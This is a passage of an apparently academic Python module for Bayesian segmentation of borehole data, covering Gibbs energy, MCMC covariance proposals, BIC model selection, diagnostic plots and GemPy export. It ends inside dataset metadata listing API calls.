:-1, 0], labels[1:, 1]).astype(float) * beta[3]\n # right column\n # left up\n ge[:, 1:, -1] += np.not_equal(comp[:, 1:, -1], labels[:-1, -2]).astype(float) * beta[3]\n # top row\n # below right\n ge[:, 0, :-1] += np.not_equal(comp[:, 0, :-1], labels[1, 1:]).astype(float) * beta[3]\n # bottom row\n # above left\n ge[:, -1, 1:] += np.not_equal(comp[:, -1, 1:], labels[-2, :-1]).astype(float) * beta[3]\n\n # **********************************************************************************************************\n # overwrite corners\n # up left\n ge[:, 0, 0] = np.not_equal(comp[:, 0, 0], labels[1, 0]).astype(float) * beta[1] \\\n + np.not_equal(comp[:, 0, 0], labels[0, 1]).astype(float) * beta[0]\n if self.stencil is \"8p\":\n ge[:, 0, 0] += np.not_equal(comp[:, 0, 0], labels[1, 1]).astype(float) * beta[3]\n\n # low left\n ge[:, -1, 0] = np.not_equal(comp[:, -1, 0], labels[-1, 1]).astype(float) * beta[0] \\\n + np.not_equal(comp[:, -1, 0], labels[-2, 0]).astype(float) * beta[1]\n if self.stencil is \"8p\":\n ge[:, -1, 0] += np.not_equal(comp[:, -1, 0], labels[-2, 1]).astype(float) * beta[2]\n\n # up right\n ge[:, 0, -1] = np.not_equal(comp[:, 0, -1], labels[1, -1]).astype(float) * beta[1] \\\n + np.not_equal(comp[:, 0, -1], labels[0, -2]).astype(float) * beta[0]\n if self.stencil is \"8p\":\n ge[:, 0, -1] += np.not_equal(comp[:, 0, -1], labels[1, -2]).astype(float) * beta[2]\n\n # low right\n ge[:, -1, -1] = np.not_equal(comp[:, -1, -1], labels[-2, -1]).astype(float) * beta[1] \\\n + np.not_equal(comp[:, -1, -1], labels[-1, -2]).astype(float) * beta[0]\n if self.stencil is \"8p\":\n ge[:, -1, -1] += np.not_equal(comp[:, -1, -1], labels[-2, -2]).astype(float) * beta[3]\n\n # reshape and transpose gibbs energy, return\n return np.array([ge[l, :, :].ravel() for l in range(self.n_labels)]).T\n\n # ************************************************************************************************\n elif dim == 3:\n # TODO: [3D] implementation of gibbs energy\n raise Exception(\"3D not yet implemented.\")\n\n def mcr(self, true_labels):\n \"\"\"Compares classified with true labels for each iteration step (for synthetic data) to obtain a measure of\n mismatch/convergence.\"\"\"\n mcr_vals = []\n n = len(true_labels)\n # TODO: [2D] implementation for MCR\n # TODO: [3D] implementation for MCR\n for label in self.labels:\n missclassified = np.count_nonzero(true_labels - label)\n mcr_vals.append(missclassified / n)\n return mcr_vals\n\n def get_std_from_cov(self, f, l):\n \"\"\"\n Extracts standard deviation from covariance matrices for feature f and label l.\n :param f: feature (int)\n :param l: label (int)\n :return standard deviation from all covariance matrices for label/feature combination\n \"\"\"\n stds = []\n for i in range(len(self.covs)):\n stds.append(np.sqrt(np.diag(self.covs[i][l])[f]))\n return stds\n\n def get_corr_coef_from_cov(self, l):\n \"\"\"\n Extracts correlation coefficient from covariance matrix for label l.\n :param l: label (int)\n :retur: correlation coefficients from all covariance matrices for given label.\n \"\"\"\n corr_coefs = []\n for i in range(len(self.covs)):\n corr_coef = self.covs[i][l, 0, 1]\n for f in [0, 1]:\n corr_coef = corr_coef / np.sqrt(np.diag(self.covs[i][l])[f])\n corr_coefs.append(corr_coef)\n return corr_coefs\n\n def plot_mu_stdev(self):\n \"\"\"Plot mean and standard deviation over all iterations.\"\"\"\n fig, ax = plt.subplots(nrows=self.n_feat, ncols=2, figsize=(15, 5 * self.n_feat))\n\n ax[0, 0].set_title(r\"$\\mu$\")\n ax[0, 1].set_title(r\"$\\sigma$\")\n\n for f in range(self.n_feat):\n for l in range(self.n_labels):\n if np.mean(np.array(self.mus)[:, :, f][:, l]) == -9999:\n continue\n else:\n ax[f, 0].plot(np.array(self.mus)[:, :, f][:, l], label=\"Label \" + str(l))\n\n ax[f, 0].set_ylabel(\"Feature \" + str(f))\n\n for l in range(self.n_labels):\n ax[f, 1].plot(self.get_std_from_cov(f, l), label=\"Label \" + str(l))\n\n ax[f, 0].set_xlabel(\"Iterations\")\n ax[f, 1].set_xlabel(\"Iterations\")\n ax[f, 1].legend(loc=9, bbox_to_anchor=(0.5, -0.25), ncol=3)\n\n plt.show()\n\n def plot_acc_ratios(self, linewidth=1):\n \"\"\"Plot acceptance ratios for beta, mu and covariance.\"\"\"\n fig, ax = plt.subplots(ncols=3, figsize=(15, 4))\n\n ax[0].set_title(r\"$\\beta$\")\n ax[0].plot(self.beta_acc_ratio, linewidth=linewidth, color=\"black\")\n\n ax[1].set_title(r\"$\\mu$\")\n ax[1].plot(self.mu_acc_ratio, linewidth=linewidth, color=\"red\")\n\n ax[2].set_title(\"Covariance\")\n ax[2].plot(self.cov_acc_ratio, linewidth=linewidth, color=\"indigo\")\n\n def diagnostics_plot(self, true_labels=None, ie_range=None, transpose=False):\n \"\"\"Diagnostic plots for analyzing convergence and segmentation results.\n\n\n Args:\n true_labels (:obj:`np.ndarray`):\n ie_range (:obj:`tuple` or :obj:`list`): Start and end point of iteration slice to used in the calculation\n of the information entropy.\n\n Returns:\n Plot\n \"\"\"\n if true_labels is not None:\n fig = plt.figure(figsize=(15, 10))\n gs = gridspec.GridSpec(4, 2)\n else:\n fig = plt.figure(figsize=(15, 10))\n gs = gridspec.GridSpec(2, 2)\n\n rcParams.update({'font.size': 8})\n\n # plot beta\n ax1 = plt.subplot(gs[0, :-1])\n ax1.set_title(r\"$\\beta$\")\n\n betas = np.array(self.betas)\n if self.dim == 1:\n ax1.plot(betas, label=\"beta\", linewidth=1)\n else:\n for b in range(betas.shape[1]):\n ax1.plot(betas[:, b], label=\"beta \" + str(b), linewidth=1)\n\n ax1.set_xlabel(\"Iterations\")\n ax1.legend()\n\n # plot correlation coefficient\n ax2 = plt.subplot(gs[0, -1])\n ax2.set_title(\"Correlation coefficient\")\n for l in range(self.n_labels):\n ax2.plot(self.get_corr_coef_from_cov(l), label=\"Label \" + str(l), linewidth=1)\n ax2.legend()\n ax2.set_xlabel(\"Iterations\")\n\n # 1D\n if self.dim == 1:\n # PLOT LABELS\n ax3 = plt.subplot(gs[1, :])\n ax3.imshow(np.array(self.labels), cmap=cmap, norm=cmap_norm, aspect='auto', interpolation='nearest')\n ax3.set_ylabel(\"Iterations\")\n ax3.set_title(\"Labels\")\n ax3.grid(False) # disable grid\n\n if true_labels is not None:\n # plot the latent field\n ax4 = plt.subplot(gs[2, :])\n ax4.imshow(np.tile(np.expand_dims(true_labels, axis=1), 50).T,\n cmap=cmap, norm=cmap_norm, aspect='auto', interpolation='nearest')\n ax4.set_title(\"Latent field\")\n ax4.grid(False)\n\n # plot the mcr\n ax5 = plt.subplot(gs[3, :])\n ax5.plot(self.mcr(true_labels), color=\"black\", linewidth=1)\n ax5.set_ylabel(\"MCR\")\n ax5.set_xlabel(\"Iterations\")\n\n # 2D\n elif self.dim == 2:\n if ie_range is None: # use all\n a = 0\n b = -1\n else: # use given range\n a = ie_range[0]\n b = ie_range[1]\n\n max_lp = labels_map(self.labels, r=(a, b))\n # print(max_lp)\n\n # PLOT LABELS\n ax3 = plt.subplot(gs[1, 0])\n ax3.set_title(\"Labels (MAP)\")\n if transpose:\n max_lp_plot = np.array(max_lp.reshape(self.shape[0], self.shape[1])).T\n else:\n max_lp_plot = np.array(max_lp.reshape(self.shape[0], self.shape[1]))\n ax3.imshow(max_lp_plot, cmap=cmap, norm=cmap_norm, interpolation='nearest')\n ax3.grid(False)\n\n # PLOT INFORMATION ENTROPY\n ie = compute_ie(compute_labels_prob(np.array(self.labels[a:b]))) # calculate ie\n ax4 = plt.subplot(gs[1, 1])\n ax4.set_title(\"Information Entropy\")\n if transpose:\n ie_plot = ie.reshape(self.shape[0], self.shape[1]).T\n else:\n ie_plot = ie.reshape(self.shape[0], self.shape[1])\n iep = ax4.imshow(ie_plot, cmap=\"viridis\", interpolation='nearest')\n ax4.grid(False)\n plt.colorbar(iep)\n\n plt.show()\n\n def nearest_points(self, layer):\n lst = self.geo_data.interfaces.loc[np.where(self.geo_data.interfaces.formation_number == layer)[0]]\n lst = lst.reset_index(drop=True)\n\n # store points pairwise with their x and y coordinate\n points = []\n for k in range(len(lst)):\n points.append((lst.loc[k, 'X'], lst.loc[k, 'Y']))\n\n # calculate distances and storage with correspondig position\n distances = []\n pos = []\n for i in range(len(points) - 1):\n for j in range(i + 1, len(points)):\n distances += [euclideanDistance(points[i], points[j])] # stores distances between two points\n pos += [[i, j]] # stores corresponding points\n\n # gives points with smallest distance\n final_points = pos[np.where(distances == min(distances))[0][0]]\n\n X = (lst.X.loc[final_points[0]] + lst.X.loc[final_points[1]]) / 2\n Y = (lst.Y.loc[final_points[0]] + lst.Y.loc[final_points[1]]) / 2\n\n # append mean point between the two nearest points\n points.append((X, Y))\n\n # calculate distance between mean point and all other values\n distances = []\n pos = []\n for i in range(len(points) - 1):\n distances += [euclideanDistance(points[i], points[-1])] # stores distances between two points\n pos += [i] # stores correspondig points\n\n # points which is nearest to mean point\n k = hq.nsmallest(3, distances)[2]\n #m = hq.nsmallest(4, distances)[3]\n\n # 3 nearest points in lst\n final_points.append(np.where(distances == k)[0][0])\n #final_points.append(np.where(distances == m)[0][0])\n\n u = np.sum(lst.loc[final_points, ['X', 'Y', 'Z','formation_number']], axis=1).values\n p = np.sum(self.geo_data.interfaces.loc[:, ['X', 'Y', 'Z','formation_number']], axis=1)\n p = p.sort_index()\n\n final_points2 = []\n for i in range(len(u)):\n final_points2.append(np.where(p == u[i])[0][0])\n\n\n\n return final_points2\n\n def normalize_feature_vectors(self):\n return (self.feat - np.mean(self.feat, axis=0).T) / np.std(self.feat, axis=0)\n\n\ndef labels_map(labels, r=None):\n if r is None:\n r = (0, -1)\n\n lp = compute_labels_prob(np.array(labels[r[0]:r[1]]))\n return np.argmax(lp, axis=0)\n\n\ndef draw_labels_vect(labels_prob):\n \"\"\"Vectorized draw of the label for each elements respective labels probability.\n\n Args:\n labels_prob (:obj:`np.ndarray`): (n_elements x n_labels) ndarray containing the element-specific labels\n probabilites for each element.\n\n Returns:\n :obj:`np.array` : Flat array containing the newly drawn labels for each element.\n\n \"\"\"\n # draw a random number between 0 and 1 for each element\n r = np.random.rand(len(labels_prob))\n # cumsum labels probabilities for each element\n p = np.cumsum(labels_prob, axis=1)\n # calculate difference between random draw and cumsum probabilities\n d = (p.T - r).T\n # compare and count to get label\n return np.count_nonzero(np.greater_equal(0, d), axis=1)\n\n\ndef evaluate(log_target_prop, log_target_prev):\n ratio = np.exp(np.longfloat(log_target_prop - log_target_prev))\n\n if (ratio > 1) or (np.random.uniform() < ratio):\n return True, ratio # if accepted\n\n else:\n return False, ratio # if rejected\n\n\ndef _propose_cov(cov_prev, n_feat, n_labels, cov_jump_length, theta_jump_length):\n \"\"\"Proposes a perturbed n-dimensional covariance matrix based on an existing one and a covariance jump length and\n theta jump length parameter.\n\n Args:\n cov_prev (:obj:`np.ndarray`): Covariance matrix.\n n_feat (int): Number of features.\n n_labels (int): Number of labels.\n cov_jump_length (float): Hyperparameter\n theta_jump_length (float): Hyperparameter\n\n Returns:\n :obj:`np.ndarray` : Perturbed covariance matrix.\n\n \"\"\"\n # do svd on the previous covariance matrix\n comb = list(combinations(range(n_feat), 2))\n n_comb = len(comb)\n theta_jump = multivariate_normal(mean=[0 for i in range(n_comb)], cov=np.ones(n_comb) * theta_jump_length).rvs()\n\n if n_comb == 1: # turn it into a list if there is only one combination (^= 2 features)\n theta_jump = [theta_jump]\n\n cov_prop = np.zeros_like(cov_prev)\n # print(\"cov_prev:\", cov_prev)\n\n # loop over all labels (=layers of the covariance matrix)\n for l in range(n_labels):\n v_l, d_l, v_l_t = np.linalg.svd(cov_prev[l, :, :])\n # print(\"v_l:\", v_l)\n # generate d jump\n log_d_jump = multivariate_normal(mean=[0 for i in range(n_feat)], cov=np.eye(n_feat) * cov_jump_length).rvs()\n # sum towards d proposal\n # if l == 0:\n d_prop = np.diag(np.exp(np.log(d_l) + log_d_jump))\n # else:\n # d_prop = np.vstack((d_prop, np.exp(np.log(d_l) + np.log(d_jump))))\n # now tackle generating v jump\n a = np.eye(n_feat)\n # print(\"a init:\", a)\n # print(\"shape a:\", np.shape(a))\n for val in range(n_comb):\n rotation_matrix = _cov_proposal_rotation_matrix(v_l[:, comb[val][0]], v_l[:, comb[val][1]], theta_jump[val])\n # print(\"rot mat:\", rotation_matrix)\n a = rotation_matrix @ a\n # print(\"a:\", a)\n # print(\"v_l:\", np.shape(v_l))\n v_prop = a @ v_l # np.matmul(a, v_l)\n # print(\"d_prop:\", d_prop)\n # print(\"v_prop:\", np.shape(v_prop))\n cov_prop[l, :, :] = v_prop @ d_prop @ v_prop.T # np.matmul(np.matmul(v_prop, d_prop), v_prop.T)\n # print(\"cov_prop:\", cov_prop)\n\n return cov_prop\n\n\ndef _cov_proposal_rotation_matrix(x, y, theta):\n \"\"\"Creates the rotation matrix needed for the covariance matrix proposal step.\n\n Args:\n x (:obj:`np.array`): First base vector.\n y (:obj:`np.array`): Second base vector.\n theta (float): Rotation angle.\n\n Returns:\n :obj:`np.ndarray` : Rotation matrix for covariance proposal step.\n\n \"\"\"\n x = np.array([x]).T\n y = np.array([y]).T\n\n uu = x / np.linalg.norm(x)\n vv = y - uu.T @ y * uu\n vv = vv / np.linalg.norm(vv)\n # what is happening\n\n # rotation_matrix = np.eye(len(x)) - np.matmul(uu, uu.T) - np.matmul(np.matmul(vv, vv.T) + np.matmul(np.hstack((uu, vv)), np.array([[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]])), np.hstack((uu, vv)).T)\n rotation_matrix = np.eye(len(x)) - uu @ uu.T - vv @ vv.T + np.hstack((uu, vv)) @ np.array(\n [[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]]) @ np.hstack((uu, vv)).T\n return rotation_matrix\n\n\ndef _calc_labels_prob(te, t):\n \"\"\"\"Calculate labels probability for array of total energies (te) and totally arbitrary skalar value t.\"\"\"\n return (np.exp(-te / t).T / np.sum(np.exp(-te / t), axis=1)).T\n\n\ndef pseudocolor(shape, stencil=None):\n \"\"\"Graph coloring based on the physical dimensions for independent labels draw.\n\n Args:\n extent (:obj:`tuple` of int): Data extent in (Y), (Y,X) or (Y,X,Z) for 1D, 2D or 3D respectively.\n stencil:\n\n Returns:\n\n \"\"\"\n dim = len(shape) - 1\n # ************************************************************************************************\n # 1-DIMENSIONAL\n if dim == 1:\n i_w = np.arange(0, shape[0], step=2)\n i_b = np.arange(1, shape[0], step=2)\n\n return np.array([i_w, i_b]).T\n\n # ************************************************************************************************\n # 2-DIMENSIONAL\n elif dim == 2:\n if stencil is None or stencil == \"8p\":\n # use 8 stamp as default, resulting in 4 colors\n colors = 4\n # color image\n colored_image = np.tile(np.kron([[0, 1], [2, 3]] * int(shape[0] / 2), np.ones((1, 1))), int(shape[1] / 2))\n colored_flat = colored_image.reshape(shape[0] * shape[1])\n\n # initialize storage array\n ci = []\n for c in range(colors):\n x = np.where(colored_flat == c)[0]\n ci.append(x)\n return np.array(ci)\n\n elif stencil == \"4p\":\n # use 4 stamp, resulting in 2 colors (checkerboard)\n colors = 2\n # color image\n colored_image = np.tile(np.kron([[0, 1], [1, 0]] * int(shape[0] / 2), np.ones((1, 1))), int(shape[1] / 2))\n colored_flat = colored_image.reshape(shape[0] * shape[1])\n\n # initialize storage array\n ci = []\n for c in range(colors):\n x = np.where(colored_flat == c)[0]\n ci.append(x)\n return ci\n else:\n raise Exception(\" In 2D space the stamp parameter needs to be either None (defaults to 8p), 4p or 8p.\")\n\n # ************************************************************************************************\n # 3-DIMENSIONAL\n elif dim == 3:\n raise Exception(\"3D space not yet supported.\")\n # TODO: 3d graph coloring\n\n\ndef bic(feat_vector, n_labels, plot):\n \"\"\"Plots the Bayesian Information Criterion of Gaussian Mixture Models for the given features and range of labels\n defined by the given upper boundary.\n\n Args:\n feat_vector (:obj:`np.ndarray`): Feature vector containing the data in a flattened format.\n n_labels (int): Sets the included upper bound for the number of features to be considered in the analysis.\n\n Returns:\n Plot\n\n \"\"\"\n n_comp = np.arange(1, n_labels + 1)\n # create array of GMMs in range of components/labels and fit to observations\n gmms = np.array([mixture.GaussianMixture(n_components=n, covariance_type=\"full\").fit(feat_vector) for n in n_comp])\n # calculate BIC for each GMM based on observartions\n bics = np.array([gmm.bic(feat_vector) for gmm in gmms])\n # take sequential difference\n # bic_diffs = np.ediff1d(bics)\n\n # find index of minimum BIC\n # bic_min = np.argmin(bics)\n # bic_diffs_min = np.argmin(np.abs(bic_diffs))\n\n # d = np.abs(bic_diffs[bic_diffs_min] * d_factor)\n bic_min = np.argmin(bics)\n\n # do a nice plot so the user knows intuitively whats happening\n if plot == True:\n fig = plt.figure() # figsize=(10, 10)\n plt.plot(n_comp, bics, label=\"bic\")\n plt.plot(n_comp[bic_min], bics[bic_min], \"ko\")\n plt.title(\"Bayesian Information Criterion\")\n plt.xlabel(\"Number of Labels\")\n plt.axvline(n_comp[bic_min], color=\"black\", linestyle=\"dashed\", linewidth=0.75)\n plt.show()\n\n print(\"global minimum: \", n_comp[bic_min])\n return n_comp[bic_min]\n\n\ndef gibbs_comp_f(a, value):\n \"\"\"Helper function for the Gibbs energy calculation using Scipy's generic filter function.\"\"\"\n a = a[a != -999.]\n return np.count_nonzero(a != value)\n\n\ndef prepare_gempy_input(input_data, result_data):\n \"\"\"Prepares the data for the input in Gempy and puts out a csv-file including the data\"\"\"\n # data convertion to gempy\n\n gempy = pd.DataFrame({'X': input_data.X, 'Y': input_data.Y, 'Z': input_data.Z, 'formation': result_data,\n 'borehole': input_data['Well Name']})\n\n for k in range(0, len(gempy) - 1):\n if gempy.loc[k, 'formation'] == gempy.loc[k + 1, 'formation']:\n gempy = gempy.drop(k)\n\n gempy.index = range(len(gempy))\n\n for k in range(0, 1 + len(set(list(gempy['formation'])))):\n gempy['formation'] = gempy['formation'].replace(to_replace=k, value='Layer%d' % (k))\n\n for k in range(0, 1 + len(set(list(gempy['formation'])))):\n gempy['formation'] = gempy['formation'].replace(to_replace=k, value='Layer%d' % (k))\n\n gempy.to_csv('../data/Gempy_Simple_4_layer_90degrees.csv', index=False)\n\n\ndef normalize_feature_vectors(self):\n return (self - np.mean(self, axis=0).T) / np.std(self, axis=0)\n\n\ndef test_bic(feature_vectors_norm,n):\n # Bayesian information criteria\n nft = []\n for k in range(2, n):\n nft.append(bic(feature_vectors_norm, k,\n plot=False)) # Investigate the number of labels (one label can include several cluster)\n nf = max(set(nft), key=nft.count) # put out the most common value in bic\n print('The optimal number of layers is: ', nf)\n return nf, nft\n\ndef euclideanDistance(coordinate1, coordinate2):\n return pow(pow(coordinate1[0] - coordinate2[0], 2) + pow(coordinate1[1] - coordinate2[1], 2), .5)", "repo_name": "cgre-aachen/MSc_theses", "sub_path": "Well_analysis_BaySeg_GemPy_coupled/bayseg/bayseg.py", "file_name": "bayseg.py", "file_ext": "py", "file_size_in_byte": 68449, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 38, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.mixture.GaussianMixture", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.mixture", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 156, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 165, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 183, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 229, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 259, "usage_type": "call"}, {"api_name": "gempy.create_data", "line_number": 273, "usage_type": "call"}, {"api_name": "pandas.unique", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 283, "usage_type": "call"}, {"api_name": "pandas.unique", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 288, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 290, "usage_type": "call"}, {"api_name": "gempy.set_orientation_from_interfaces", "line_number": 298, "usage_type": "call"}, {"api_name": "gempy.set_series", "line_number": 302, "usage_type": "call"}, {"api_name": "gempy.InterpolatorData", "line_number": 308, "usage_type": "call"}, {"api_name": "gempy.compute_model", "line_number": 313, "usage_type": "call"}, {"api_name": "gempy.plotting.plot_section", "line_number": 318, "usage_type": "call"}, {"api_name": "gempy.plotting", "line_number": 318, "usage_type": "attribute"}, {"api_name": "gempy.plotting.plot_section", "line_number": 321, "usage_type": "call"}, {"api_name": "gempy.plotting", "line_number": 321, "usage_type": "attribute"}, {"api_name": "gempy.get_surfaces", "line_number": 324, "usage_type": "call"}, {"api_name": "gempy.plotting.plot_surfaces_3D_real_time", "line_number": 325, "usage_type": "call"}, {"api_name": "gempy.plotting", "line_number": 325, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 389, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 398, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 399, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 428, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 428, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 437, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 439, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 440, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 445, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 445, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 447, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 449, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 450, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 455, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 455, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 457, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 459, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 460, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 461, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 482, "usage_type": "call"}, {"api_name": "tqdm.trange", "line_number": 502, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 555, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 614, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 615, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 621, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 640, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 647, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 673, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 710, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 737, "usage_type": "call"}, {"api_name": "numpy.errstate", "line_number": 748, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 749, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 749, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 754, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 760, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 760, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 761, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 762, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 762, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 762, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 762, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 763, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 763, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 763, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 763, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 764, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 764, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 764, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 791, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 794, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 808, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 811, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 811, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 826, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 829, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 831, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 833, "usage_type": "call"}, {"api_name": "numpy.errstate", "line_number": 834, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 835, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 837, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 851, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 855, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 856, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 857, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 857, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 858, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 858, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 859, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 859, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 879, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 881, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 882, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 885, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 885, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 887, "usage_type": "call"}, {"api_name": "numpy.not_equal", "line_number": 890, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 890, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 892, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 903, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 903, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 906, "usage_type": "call"}, {"api_name": 